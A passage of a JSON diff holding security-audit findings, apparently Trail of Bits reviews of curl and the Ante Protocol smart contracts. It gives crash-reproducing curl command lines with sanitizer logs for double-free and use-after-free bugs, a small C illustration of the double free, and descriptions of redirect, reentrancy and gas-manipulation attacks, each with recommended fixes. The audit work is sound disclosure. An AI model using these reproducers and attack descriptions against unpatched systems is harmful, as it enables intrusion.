glibc allocator's checks may fail to detect such cases on some occasions. The success of both frees indicates that future memory allocations made by the program may return the same pointer twice. This may enable exploitation of cURL if the allocated objects contain data controlled by an attacker. Additionally, if this vulnerability also triggers in libcurl (which we believe it should), it may enable the exploitation of programs that depend on libcurl.
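Reduced to its essence, the defect is two structures that keep aliases of one allocation, each with its own cleanup path. The following standalone illustration (our code, not curl's; the field names merely echo the ones above) reproduces the pattern:

    #include <stdlib.h>

    struct conn { void *connect_state; };
    struct req  { void *p; };

    int main(void) {
        struct conn c;
        struct req r;
        void *state = calloc(1, 64); /* one allocation... */
        c.connect_state = state;     /* ...owner #1 */
        r.p = state;                 /* ...owner #2: alias is never cleared */
        free(c.connect_state);       /* conn_free-style cleanup */
        c.connect_state = NULL;      /* clearing one alias does not help... */
        free(r.p);                   /* ...the second cleanup path double-frees */
        return 0;
    }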
$ nc -l 1337 | echo 'test' & # Imitation of a proxy server using netcat $ curl -x http://test:test@127.0.0.1:1337 dict://127.0.0.1 ==2069694==ERROR: AddressSanitizer: attempting double-free on 0x617000000780 in thread T0: #0 0x494c8d in free (curl/src/.libs/curl+0x494c8d) #1 0x7f1eeeaf3afe in Curl_free_request_state curl/lib/url.c:2259:3 #2 0x7f1eeeaf3afe in Curl_close curl/lib/url.c:421:3 #3 0x7f1eeea30943 in curl_easy_cleanup curl/lib/easy.c:798:3 #4 0x4e07df in post_per_transfer curl/src/tool_operate.c:656:3 #5 0x4dee58 in serial_transfers curl/src/tool_operate.c:2434:18 #6 0x4dee58 in run_all_transfers curl/src/tool_operate.c:2620:16 #7 0x4dee58 in operate curl/src/tool_operate.c:2732:18 #8 0x4dcf73 in main curl/src/tool_main.c:276:14 #9 0x7f1eee2af082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #10 0x41c7cd in _start (curl/src/.libs/curl+0x41c7cd) 0x617000000780 is located 0 bytes inside of 664-byte region [0x617000000780,0x617000000a18) freed by thread T0 here: #0 0x494c8d in free (curl/src/.libs/curl+0x494c8d) #1 0x7f1eeeaf6094 in conn_free curl/lib/url.c:814:3 #2 0x7f1eeea92cc6 in curl_multi_perform curl/lib/multi.c:2684: #3 0x7f1eeea304bd in easy_transfer curl/lib/easy.c:662:15 #4 0x7f1eeea304bd in easy_perform curl/lib/easy.c:752:42 #5 0x7f1eeea304bd in curl_easy_perform curl/lib/easy.c:771:10 #6 0x4dee35 in serial_transfers curl/src/tool_operate.c:2432:16 #7 0x4dee35 in run_all_transfers curl/src/tool_operate.c:2620:16 #8 0x4dee35 in operate curl/src/tool_operate.c:2732:18 #9 0x4dcf73 in main curl/src/tool_main.c:276:14 #10 0x7f1eee2af082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 previously allocated by thread T0 here: #0 0x495082 in calloc (curl/src/.libs/curl+0x495082) #1 0x7f1eeea6d642 in connect_init curl/lib/http_proxy.c:174:9 #2 0x7f1eeea6d642 in Curl_proxyCONNECT curl/lib/http_proxy.c:1061:14 #3 0x7f1eeea6d1f2 in Curl_proxy_connect curl/lib/http_proxy.c:118:14 #4 0x7f1eeea94c33 in multi_runsingle curl/lib/multi.c:2028:16 #5 0x7f1eeea92cc6 in curl_multi_perform curl/lib/multi.c:2684:14 #6 0x7f1eeea304bd in easy_transfer curl/lib/easy.c:662:15 #7 0x7f1eeea304bd in easy_perform curl/lib/easy.c:752:42 #8 0x7f1eeea304bd in curl_easy_perform curl/lib/easy.c:771:10 #9 0x4dee35 in serial_transfers curl/src/tool_operate.c:2432:16 #10 0x4dee35 in run_all_transfers curl/src/tool_operate.c:2620:16 #11 0x4dee35 in operate curl/src/tool_operate.c:2732:18 #12 0x4dcf73 in main curl/src/tool_main.c:276:14 #13 0x7f1eee2af082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: double-free (curl/src/.libs/curl+0x494c8d) in free Figure 7.1: Reproducing double free vulnerability with ASAN log 158 static CURLcode connect_init(struct Curl_easy *data, bool reinit) // (...) 174 s = calloc(1, sizeof(struct http_connect_state)); Figure 7.2: Allocating a block of memory that is freed twice (curl/lib/http_proxy.c#158-174) 787 static void conn_free(struct connectdata *conn) // (...)
814 Curl_safefree(conn->connect_state); Figure 7.3: The conn_free function that frees the http_connect_state struct for HTTP CONNECT (curl/lib/url.c#787-814) 2257 void Curl_free_request_state(struct Curl_easy *data) 2258 { 2259 Curl_safefree(data->req.p.http); 2260 Curl_safefree(data->req.newurl); Figure 7.4: The Curl_free_request_state function that frees elements in the Curl_easy struct, which leads to a double free vulnerability (curl/lib/url.c#2257-2260) Exploit Scenario An attacker finds a way to exploit the double free vulnerability described in this finding, either in cURL or in a program that uses libcurl, and gets remote code execution on the machine on which the cURL code was executed. Recommendations Short term, fix the double free vulnerability described in this finding. Long term, expand cURL's unit tests and fuzz tests to cover different types of proxies for supported protocols. Also, extend the fuzzing strategy to cover argv fuzzing. It can be obtained using the approach presented in argv-fuzz-inl.h from the AFL++ project. This will force the fuzzer to build an argv pointer array (which points to arguments passed to cURL) from NULL-delimited standard input. Finally, consider adding a dictionary with possible options and protocols to the fuzzer based on the source code or on cURL's manual.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "8. Some flags override previous instances of themselves ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "Some cURL flags, when provided multiple times, override themselves and effectively use only the last instance provided. If a flag makes a cURL invocation's security options stricter, then accidental overwriting may weaken the desired security. The identified flag with this property is the --crlfile command-line option. It allows users to pass a PEM-formatted certificate revocation list to cURL. --crlfile (TLS) Provide a file using PEM format with a Certificate Revocation List that may specify peer certificates that are to be considered revoked. If this option is used several times, the last one will be used. Example: curl --crlfile rejects.txt https://example.com Added in 7.19.7. Figure 8.1: The description of the --crlfile option Exploit Scenario A user wishes for cURL to reject certificates specified across multiple certificate revocation lists. He unwittingly uses the --crlfile flag multiple times, dropping all but the last-specified list. Requests the user sends with cURL are intercepted by a Man-in-the-Middle attacker, who uses a known-compromised certificate to bypass TLS protections. Recommendations Short term, change the behavior of --crlfile to append new certificates to the revocation list, not to replace those specified earlier. If backwards compatibility prevents this, have cURL issue a warning such as --crlfile specified multiple times, using only ... Long term, ensure that behavior, such as how multiple instances of a command-line argument are handled, is consistent throughout the application. Issue a warning when a security-relevant flag is provided multiple times.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "9.
Cookies are not stripped after redirect ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "If cookies are passed to cURL via the --cookie flag, they will not be stripped if the target responds with a redirect. RFC 9110 section 15.4, Redirection 3xx, does not specify whether or not cookies should be stripped during a redirect; as such, it may be better to err on the side of caution and strip them by default if the origin changes. The recommended behavior would match the current behavior with the cookie jar (i.e., when a server sets a new cookie and requests a redirect) and the Authorization header (which is stripped on cross-origin redirects). Recommendations Short term, if backwards compatibility would not prohibit such a change, strip cookies upon a redirect to a different origin by default and provide a command-line flag that enables the previous behavior (or extend the --location-trusted flag). Long term, in cases where a specification is ambiguous and practicality allows, always default to the most secure possible interpretation. Extend tests to check the behavior of passing data after redirection.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "10. Use after free while using parallel option and sequences ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "Using cURL with the parallel option (-Z), two consecutive sequences (that end up creating 51 hosts), and an unmatched bracket triggers a use-after-free vulnerability (figure 10.1). The add_parallel_transfers function allocates a memory block for each transfer's error buffer and, by default, allows up to 50 transfers (figure 10.2, line 2228). Then, in the Curl_failf function, it copies errors (e.g., Could not resolve host: q{ ) to the appropriate error buffers when connections fail (figure 10.3) and frees the memory. For the last sequence (the u~ host), it allocates a memory buffer (figure 10.2), frees the buffer (figure 10.3), and copies an error (Could not resolve host: u~) to the previously freed memory buffer (figure 10.4). $ curl 0 -Z [q-u][u-~] } curl: (7) Failed to connect to 0.0.0.0 port 80 after 0 ms: Connection refused curl: (3) unmatched close brace/bracket in URL position 1: } ^ curl: (6) Could not resolve host: q{ curl: (6) Could not resolve host: q| curl: (6) Could not resolve host: q} curl: (6) Could not resolve host: q~ curl: (6) Could not resolve host: r{ curl: (6) Could not resolve host: r| curl: (6) Could not resolve host: r} curl: (6) Could not resolve host: r~ curl: (6) Could not resolve host: s{ curl: (6) Could not resolve host: s| curl: (6) Could not resolve host: s} curl: (6) Could not resolve host: s~ curl: (6) Could not resolve host: t{ curl: (6) Could not resolve host: t| curl: (6) Could not resolve host: t} curl: (6) Could not resolve host: t~ curl: (6) Could not resolve host: u{ curl: (6) Could not resolve host: u| curl: (6) Could not resolve host: u} curl: (3) unmatched close brace/bracket in URL position 1: } ^ ==2789144==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000004780 at pc 0x7f9b5f94016d bp 0x7fff12d4dbc0 sp 0x7fff12d4d368 WRITE of size #0 0x7f9b5f94016c in __interceptor_strcpy ../../../../src/libsanitizer/asan/asan_interceptors.cc:431 #1 0x7f9b5f7ce6f4 in strcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:90 #2 0x7f9b5f7ce6f4 in Curl_failf /home/scooby/curl/lib/sendf.c:275
#3 0x7f9b5f78309a in Curl_resolver_error /home/scooby/curl/lib/hostip.c:1316 #4 0x7f9b5f73cb6f in Curl_resolver_is_resolved /home/scooby/curl/lib/asyn-thread.c:596 #5 0x7f9b5f7bc77c in multi_runsingle /home/scooby/curl/lib/multi.c:1979 #6 0x7f9b5f7bf00f in curl_multi_perform /home/scooby/curl/lib/multi.c:2684 #7 0x55d812f7609e in parallel_transfers /home/scooby/curl/src/tool_operate.c:2308 #8 0x55d812f7609e in run_all_transfers /home/scooby/curl/src/tool_operate.c:2618 #9 0x55d812f7609e in operate /home/scooby/curl/src/tool_operate.c:2732 #10 0x55d812f4ffa8 in main /home/scooby/curl/src/tool_main.c:276 #11 0x7f9b5f1aa082 in __libc_start_main ../csu/libc-start.c:308 #12 0x55d812f506cd in _start (/usr/local/bin/curl+0x316cd) 0x611000004780 is located 0 bytes inside of 256-byte region [0x611000004780,0x611000004880) freed by thread T0 here: #0 0x7f9b5f9b140f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122 #1 0x55d812f75682 in add_parallel_transfers /home/scooby/curl/src/tool_operate.c:2251 previously allocated by thread T0 here: #0 0x7f9b5f9b1808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x55d812f75589 in add_parallel_transfers /home/scooby/curl/src/tool_operate.c:2228 SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/asan/asan_interceptors.cc:431 in __interceptor_strcpy Shadow bytes around the buggy address: 0x0c227fff88a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff88b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff88c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c227fff88d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff88e0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa =>0x0c227fff88f0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff8900: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff8910: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c227fff8920: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff8930: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa 0x0c227fff8940: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Heap left redzone: fa Freed heap region: fd ==2789144==ABORTING Figure 10.1: Reproducing use-after-free vulnerability with ASAN log 2192 static CURLcode add_parallel_transfers(struct GlobalConfig *global, CURLM *multi, CURLSH *share, bool *morep, bool *addedp) 2197 { // (...) 2210 for(per = transfers; per && (all_added < global->parallel_max); per = per->next) { // (...) 2227 if(!errorbuf) { 2228 errorbuf = malloc(CURL_ERROR_SIZE); // (...) 2249 result = create_transfer(global, share, &getadded); 2250 if(result) { 2251 free(errorbuf); 2252 return result; 2253 } Figure 10.2: The add_parallel_transfers function (curl/src/tool_operate.c#2192-2253) 264 void Curl_failf(struct Curl_easy *data, const char *fmt, ...) 265 { // (...) 275 strcpy(data->set.errorbuffer, error); Figure 10.3: The Curl_failf function that copies the appropriate error to the error buffer (curl/lib/sendf.c#264-275) Exploit Scenario An administrator sets up a service that calls cURL, where some of the cURL command-line arguments are provided from external, untrusted input. An attacker manipulates the input to exploit the use-after-free bug to run arbitrary code on the machine that runs cURL. Recommendations Short term, fix the use-after-free vulnerability described in this finding.
Long term, extend the fuzzing strategy to cover argv fuzzing. It can be obtained using argv-fuzz-inl.h from the AFL++ project to build argv from stdin in cURL. Also, consider adding a dictionary with possible options and protocols to the fuzzer based on the source code or cURL's manual.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "11. Unused memory blocks are not freed, resulting in memory leaks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "For specific commands (figures 11.1, 11.2, 11.3), cURL allocates blocks of memory that are not freed when they are no longer needed, leading to memory leaks. $ curl 0 -Z 0 -Tz 0 curl: Can't open 'z'! curl: try 'curl --help' or 'curl --manual' for more information curl: (26) Failed to open/read local data from file/application ==2798000==ERROR: LeakSanitizer: detected memory leaks Direct leak of 4848 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eba06 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:153 #1 0x561bb1d1dc9f in glob_url /home/scooby/curl/src/tool_urlglob.c:459 Indirect leak of 8 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eb808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x561bb1d1e06c in glob_fixed /home/scooby/curl/src/tool_urlglob.c:48 #2 0x561bb1d1e06c in glob_parse /home/scooby/curl/src/tool_urlglob.c:411 #3 0x561bb1d1e06c in glob_url /home/scooby/curl/src/tool_urlglob.c:467 Indirect leak of 2 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eb808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x561bb1d1e0b0 in glob_fixed /home/scooby/curl/src/tool_urlglob.c:53 #2 0x561bb1d1e0b0 in glob_parse /home/scooby/curl/src/tool_urlglob.c:411 #3 0x561bb1d1e0b0 in glob_url /home/scooby/curl/src/tool_urlglob.c:467 Indirect leak of 2 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eb808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x561bb1d1dc6a in glob_url /home/scooby/curl/src/tool_urlglob.c:454 Figure 11.1: Reproducing a memory leak vulnerability in the tool_urlglob.c file with LeakSanitizer log $ curl 00 --cu 00 curl: (7) Failed to connect to 0.0.0.0 port 80 after 0 ms: Connection refused ==2798691==ERROR: LeakSanitizer: detected memory leaks Direct leak of 3 byte(s) in 1 object(s) allocated from: #0 0x7fbc6811b3ed in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cc:445 #1 0x56412ed047ee in getparameter /home/scooby/curl/src/tool_getparam.c:1885 SUMMARY: AddressSanitizer: 3 byte(s) leaked in 1 allocation(s). Figure 11.2: Reproducing a memory leak vulnerability in the tool_getparam.c file with LeakSanitizer log $ curl --proto=0 --proto=0 Warning: unrecognized protocol '0' Warning: unrecognized protocol '0' curl: no URL specified! curl: try 'curl --help' or 'curl --manual' for more information ================================================================= ==2799783==ERROR: LeakSanitizer: detected memory leaks Direct leak of 1 byte(s) in 1 object(s) allocated from: #0 0x7f90391803ed in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cc:445 #1 0x55e405955ab7 in proto2num /home/scooby/curl/src/tool_paramhlp.c:385 SUMMARY: AddressSanitizer: 1 byte(s) leaked in 1 allocation(s).
Figure 11.3: Reproducing a memory leak vulnerability in the tool_paramhlp.c file with LeakSanitizer log Exploit Scenario An attacker finds a way to allocate large amounts of memory on the local machine, which leads to the overconsumption of resources and a denial-of-service attack. Recommendations Short term, fix the memory leaks described in this finding by freeing memory blocks that are no longer needed. Long term, extend the fuzzing strategy to cover argv fuzzing. It can be obtained using argv-fuzz-inl.h from the AFL++ project to build argv from stdin in cURL. Also, consider adding a dictionary with possible options and protocols to the fuzzer based on the source code or cURL's manual.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "12. Referer header is generated in an insecure manner ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "cURL automatically sets the referer header for HTTP redirects when provided with the --referer \";auto\" flag. The header set contains the entire original URL except for the user-password part. The URL includes query parameters, which is against current best practices for handling the referer, which say to default to the strict-origin-when-cross-origin option. The option instructs clients to send only the URL's origin for cross-origin redirects, and not to send the header to less secure destinations (e.g., when redirecting from the HTTPS to the HTTP protocol). Exploit Scenario A user uses cURL to send a request to a server that requires multi-step authorization. He provides the authorization token as a query parameter and enables redirects with the --location flag. Because of a server misconfiguration, a 302 redirect response with an incorrect Location header that points to a third-party domain is sent back to cURL. cURL requests the third-party domain, leaking the authorization token via the referer header. Recommendations Short term, send only the origin instead of the whole URL on cross-origin requests in the referer header. Consider not sending the header on redirects that downgrade the security level. Additionally, consider implementing support for the Referrer-Policy response header. Alternatively, introduce a new flag that would allow users to set the desired referrer policy manually. Long term, review response headers that change the behavior of HTTP redirects and ensure either that they are supported by cURL or that secure defaults are implemented. References Feature: Referrer Policy: Default to strict-origin-when-cross-origin", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "13. Redirect to localhost and local network is possible (Server-side request forgery like) ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "When redirects are enabled with cURL (i.e., the --location flag is provided), a server may redirect a request to an arbitrary endpoint, and cURL will issue a request to it. This gives requested servers partial access to cURL users' local networks. The issue is similar to the Server-Side Request Forgery (SSRF) attack vector, but in the context of the client application. Exploit Scenario A user sends a request using cURL to a malicious server with the --location flag.
The server responds with a 302 redirect to the http://192.168.0.1:1080?malicious=data endpoint, accessing the user's router's admin panel. Recommendations Short term, add a warning about this attack vector to the --location flag documentation. Long term, consider disallowing redirects to private networks and the loopback interface by default, either introducing a new flag to disable the restriction or extending the --location-trusted flag's functionality.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "14. URL parsing from redirect is incorrect when no path separator is provided ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "When cURL parses a URL from the Location header for an HTTP redirect and the URL does not contain a path separator (/), cURL incorrectly duplicates query strings (i.e., data after the question mark) and fragments (data after the hash sign). cURL correctly parses similar URLs when they are provided directly on the command line. This behavior indicates that different parsers are used for direct URLs and URLs from redirects, which may lead to further bugs. $ curl -v -L 'http://local.test?redirect=http://local.test:80?-123' * Trying 127.0.0.1:80... * Connected to local.test (127.0.0.1) port 80 (#0) > GET /?redirect=http://local.test:80?-123 HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Location: http://local.test:80?-123 < Date: Mon, 10 Oct 2022 14:53:46 GMT < Connection: keep-alive < Keep-Alive: timeout=5 < Transfer-Encoding: chunked < * Ignoring the response-body * Connection #0 to host local.test left intact * Issue another request to this URL: 'http://local.test:80/?-123?-123' * Found bundle for host: 0x6000039287b0 [serially] * Re-using existing connection #0 with host local.test * Connected to local.test (127.0.0.1) port 80 (#0) > GET /?-123?-123 HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Mon, 10 Oct 2022 14:53: < Connection: keep-alive < Keep-Alive: timeout=5 < Content-Length: 16 < * Connection #0 to host local.test left intact HTTP Connection! Figure 14.1: Example logging output from cURL, presenting the bug in parsing URLs from the Location header, with port and query parameters $ curl -v -L 'http://local.test?redirect=http://local.test%23-123' * Trying 127.0.0.1:80...
* Connected to local.test (127.0.0.1) port 80 (#0) > GET /?redirect=http://local.test%23-123 HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Location: http://local.test#-123 < Date: Mon, 10 Oct 2022 14:56:05 GMT < Connection: keep-alive < Keep-Alive: timeout=5 < Transfer-Encoding: chunked < * Ignoring the response-body * Connection #0 to host local.test left intact * Issue another request to this URL: 'http://local.test/#-123#-123' * Found bundle for host: 0x6000003f47b0 [serially] * Re-using existing connection #0 with host local.test * Connected to local.test (127.0.0.1) port 80 (#0) > GET / HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Mon, 10 Oct 2022 14:56:05 GMT < Connection: keep-alive < Keep-Alive: timeout=5 < Content-Length: 16 < * Connection #0 to host local.test left intact HTTP Connection! Figure 14.2: Example logging output from cURL, presenting the bug in parsing URLs from the Location header, without port and with fragment Exploit Scenario A user of cURL accesses data from a server. The server redirects cURL to another endpoint. cURL incorrectly duplicates the query string in the new request. The other endpoint uses the incorrect data, which negatively affects the user. Recommendations Short term, fix the parsing bug in the Location header parser. Long term, use a single, centralized API for URL parsing in the whole cURL codebase. Expand tests with checks of redirect-response parsing.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "1. AntePoolFactory does not validate create2 return addresses ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", + "body": "The AntePoolFactory uses the create2 instruction to deploy an AntePool and then initializes it with an already-deployed AnteTest address. However, the AntePoolFactory does not validate the address returned by create2, which will be the zero address if the deployment operation fails. bytes memory bytecode = type(AntePool).creationCode; bytes32 salt = keccak256(abi.encodePacked(testAddr)); assembly { testPool := create2(0, add(bytecode, 0x20), mload(bytecode), salt) } poolMap[testAddr] = testPool; allPools.push(testPool); AntePool(testPool).initialize(anteTest); emit AntePoolCreated(testAddr, testPool); Figure 1.1: contracts/AntePoolFactory.sol#L35-L47 This lack of validation does not currently pose a problem, because the simplicity of AntePool contracts helps prevent deployment failures (and thus the return of the zero address). However, deployment issues could become more likely in future iterations of the Ante Protocol. Recommendations Short term, have the AntePoolFactory check the address returned by the create2 operation against the zero address. Long term, ensure that the results of operations that return a zero address in the event of a failure (such as create2 and ecrecover operations) are validated appropriately.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "2. Events emitted during critical operations omit certain details ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", + "body": "Events are generally emitted for all critical state-changing operations within the system.
However, the AntePoolCreated event emitted by the AntePoolFactory does not capture the address of the msg.sender that deployed the AntePool. This information would help provide a more complete audit trail in the event of an attack, as the msg.sender often refers to the externally owned account that sent the transaction but could instead refer to an intermediate smart contract address. emit AntePoolCreated(testAddr, testPool); Figure 2.1: contracts/AntePoolFactory.sol#L47 Additionally, consider having the AntePool.updateDecay method emit an event with the pool share parameters used in decay calculations. Recommendations Short term, capture the msg.sender in the AntePoolFactory.AntePoolCreated event, and have AntePool.updateDecay emit an event that includes the relevant decay calculation parameters. Long term, ensure critical state-changing operations trigger events sufficient to form an audit trail in the event of a system failure. Events should capture relevant parameters to help auditors determine the cause of failure.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "4. Looping over an array of unbounded size can cause a denial of service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", + "body": "If an AnteTest fails, the _checkTestNoRevert function will return false, causing the checkTest function to call _calculateChallengerEligibility to compute eligibleAmount; this value is the total stake of the eligible challengers and is used to calculate the proportion of _remainingStake owed to each challenger. To calculate eligibleAmount, the _calculateChallengerEligibility function loops through an unbounded array of challenger addresses. When the number of challengers is large, the function will consume a large quantity of gas in this operation. function _calculateChallengerEligibility() internal { uint256 cutoffBlock = failedBlock.sub(CHALLENGER_BLOCK_DELAY); for (uint256 i = 0; i < challengers.addresses.length; i++) { address challenger = challengers.addresses[i]; if (eligibilityInfo.lastStakedBlock[challenger] < cutoffBlock) { eligibilityInfo.eligibleAmount = eligibilityInfo.eligibleAmount.add( _storedBalance(challengerInfo.userInfo[challenger], challengerInfo) ); } } } Figure 4.1: contracts/AntePool.sol#L553-L563 However, triggering an out-of-gas error would be costly to an attacker; the attacker would need to create many accounts through which to stake funds, and the amount of each stake would decay over time. Exploit Scenario The length of the challenger address array grows such that the computation of the eligibleAmount causes the block to reach its gas limit. Then, because of this Ethereum-imposed gas constraint, the entire transaction reverts, and the failing AnteTest is not marked as failing. As a result, challengers who have staked funds in anticipation of a failed test will not receive a payout. Recommendations Short term, determine the number of challengers that can enter an AntePool without rendering the _calculateChallengerEligibility function's operation too gas-intensive; then, use that number as the upper limit on the number of challengers.
Long term, avoid calculating every challenger's proportion of _remainingStake in the same operation; instead, calculate each user's pro-rata share when he or she enters the pool and modify the challenger delay to require that a challenger register and wait 12 blocks before minting his or her pro-rata share. Upon a test failure, a challenger would burn these shares and redeem them for ether.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "3. Insufficient gas can cause AnteTests to produce false positives ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", + "body": "Once challengers have staked ether and the challenger delay has passed, they can submit transactions to predict that a test will fail and to earn a bonus if it does. An attacker could manipulate the result of an AnteTest by providing a limited amount of gas to the checkTest function, forcing the test to fail. This is because the anteTest.checkTestPasses function receives 63/64 of the gas provided to checkTest (per the 63/64 gas forwarding rule), which may not be enough. This issue stems from the use of a try-catch statement in the _checkTestNoRevert function, which causes the function to return false when an EVM exception occurs, indicating a test failure. We set the difficulty of this finding to high, as the outer call will also revert with an out-of-gas exception if it requires more than 1/64 of the gas; however, other factors (e.g., the block gas limit) may change in the future, allowing for a successful exploitation.
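Illustrative arithmetic (our numbers, for intuition only): if anteTest.checkTestPasses needs 1,000,000 gas to complete, an attacker who arranges for checkTest to be entered with roughly 1,000,000 gas leaves the inner call at most 63/64 * 1,000,000 = 984,375 gas, so it runs out, while about 15,625 gas remains in the outer frame; the attack succeeds only if that remainder covers the post-failure bookkeeping, which is why the difficulty is rated high.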
if (!_checkTestNoRevert()) { updateDecay(); verifier = msg.sender; failedBlock = block.number; pendingFailure = true; _calculateChallengerEligibility(); _bounty = getVerifierBounty(); uint256 totalStake = stakingInfo.totalAmount.add(withdrawInfo.totalAmount); _remainingStake = totalStake.sub(_bounty); Figure 3.1: Part of the checkTest function /// @return passes bool if the Ante Test passed function _checkTestNoRevert() internal returns (bool) { try anteTest.checkTestPasses() returns (bool passes) { return passes; } catch { return false; } } Figure 3.2: contracts/AntePool.sol#L567-L573 Exploit Scenario An attacker calculates the amount of gas required for checkTest to run out of gas in the inner call to anteTest.checkTestPasses. The test fails, and the attacker claims the verifier bounty. Recommendations Short term, ensure that the AntePool reverts if the underlying AnteTest does not have enough gas to return a meaningful value. Long term, redesign the test verification mechanism such that gas usage does not cause false positives.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "5. Reentrancy into AntePool.checkTest scales challenger eligibility amount ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", + "body": "A malicious AnteTest or underlying contract being tested can trigger multiple failed checkTest calls by reentering the AntePool.checkTest function. With each call, the _calculateChallengerEligibility method increases the eligibleAmount instead of resetting it, causing the eligibleAmount to scale unexpectedly with each reentrancy. function checkTest() external override testNotFailed { require(challengers.exists(msg.sender), \"ANTE: Only challengers can checkTest\"); require( block.number.sub(eligibilityInfo.lastStakedBlock[msg.sender]) > CHALLENGER_BLOCK_DELAY, \"ANTE: must wait 12 blocks after challenging to call checkTest\" ); numTimesVerified = numTimesVerified.add(1); lastVerifiedBlock = block.number; emit TestChecked(msg.sender); if (!_checkTestNoRevert()) { updateDecay(); verifier = msg.sender; failedBlock = block.number; pendingFailure = true; _calculateChallengerEligibility(); _bounty = getVerifierBounty(); uint256 totalStake = stakingInfo.totalAmount.add(withdrawInfo.totalAmount); _remainingStake = totalStake.sub(_bounty); emit FailureOccurred(msg.sender); } } Figure 5.1: contracts/AntePool.sol#L292-L316 function _calculateChallengerEligibility() internal { uint256 cutoffBlock = failedBlock.sub(CHALLENGER_BLOCK_DELAY); for (uint256 i = 0; i < challengers.addresses.length; i++) { address challenger = challengers.addresses[i]; if (eligibilityInfo.lastStakedBlock[challenger] < cutoffBlock) { eligibilityInfo.eligibleAmount = eligibilityInfo.eligibleAmount.add( _storedBalance(challengerInfo.userInfo[challenger], challengerInfo) ); } } } Figure 5.2: contracts/AntePool.sol#L553-L563 Appendix D includes a proof-of-concept AnteTest contract and hardhat unit test that demonstrate this issue. Exploit Scenario An attacker deploys an AnteTest contract or a vulnerable contract to be tested. The attacker directs the deployed contract to call AntePool.stake, which registers the contract as a challenger. The malicious contract then reenters 